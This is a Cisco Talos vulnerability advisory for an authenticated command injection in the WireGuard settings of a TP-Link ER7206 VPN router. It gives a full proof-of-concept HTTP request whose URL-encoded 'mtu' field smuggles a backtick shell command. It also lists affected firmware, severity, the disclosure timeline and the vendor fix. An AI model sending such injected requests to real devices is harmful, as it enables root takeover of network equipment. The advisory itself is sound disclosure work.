Talos Vulnerability Report

TALOS-2023-1857

TP-Link ER7206 Omada Gigabit VPN Router uhttpd Wireguard VPN command injection vulnerability

February 6, 2024

CVE Number

CVE-2023-46683

SUMMARY

A post authentication command injection vulnerability exists when configuring the wireguard VPN functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection . An attacker can make an authenticated HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591

PRODUCT URLS

ER7206 Omada Gigabit VPN Router - <https://www.tp-link.com/us/business-networking/vpn-router/er7206/&gt;

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

DETAILS

The ER7206 Omada Gigabit VPN Router is a high-performance networking solution that supports gigabit connectivity, highly secure VPN and integration with Omada SDN for centralized cloud management and zero-touch provisioning.

The ER7206 Omada Gigabit VPN Router runs various services to manage the router or devices connected to the router. One such service is uhttpd which runs on port 80/443. It gives users a web interface to configure and manage the router. By default, the service runs as a root user. An attacker can gain root access to the device by exploiting this service.

A command injection vulnerability exists in the uhttpd service when a wireguard VPN is configured. In the web interface, the wireguard VPN page can be accessed by navigating to VPN -> Wireguard -> Wireguard. It contains features to add, edit, and delete wireguard VPN configs. When a wireguard VPN config is added, it triggers the following HTTP Post request:

POST /cgi-bin/luci/;stok=9e2eb3d79de53c7c782818e1c1207a22/admin/wireguard?form=wireguard HTTP/1.1
Host: 192.168.8.100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 493
Origin: http://192.168.8.100
Connection: close
Referer: http://192.168.8.100/webpages/index.html
Cookie: sysauth=92aa29a050e499c3535fe22777162b24

data=%7b%22method%22%3a%22add%22%2c%22params%22%3a%7b%22index%22%3a1%2c%22old%22%3a%22add%22%2c%22new%22%3a%7b%22name%22%3a%22BBBCBB%22%2c%22mtu%22%3a%221420%60id%3e%2ftmp%2fattack_pptp_gloabl1%60%22%2c%22listen_port%22%3a%2251828%22%2c%22private_key%22%3a%22iLyVlWgnFvSjbwToLV3CByPjnHTM2wnRUYeopez9XEo%3d%5c%22BBBB%22%2c%22public_key%22%3a%22F29F0HmVdvi8VZvl%2fqLyU140Gx3mlipCctgu4rPdh0U%3d%22%2c%22local_ipaddr%22%3a%22192.168.8.1%22%2c%22status%22%3a%22on%22%7d%2c%22id%22%3a%22add%22%7d%7d

The MTU parameter of the configuration is vulnerable to the command injection vulnerbaility. It is used as an argument to a shell command without any sanitization. An attacker, by including shell metacharacters in the mtu parameter, can manipulate the executed command and introduce unauthorized commands, which leads to the command injection vulnerability. Even though administrative access is required to trigger this vulnerability, it can be used to acquire an unrestricted shell access to the device.

VENDOR RESPONSE

The vendor released a new firmware available at: https://www.tp-link.com/us/support/download/er7206/v1/#Firmware

TIMELINE

2023-12-04 - Initial Vendor Contact
2023-12-05 - Vendor Disclosure
2024-02-01 - Vendor Patch Release
2024-02-06 - Public Release

Credit

Discovered by the Vulnerability Discovery and Research team of Cisco Talos.

---

Vulnerability Reports Next Report

TALOS-2023-1858

Previous Report

TALOS-2023-1856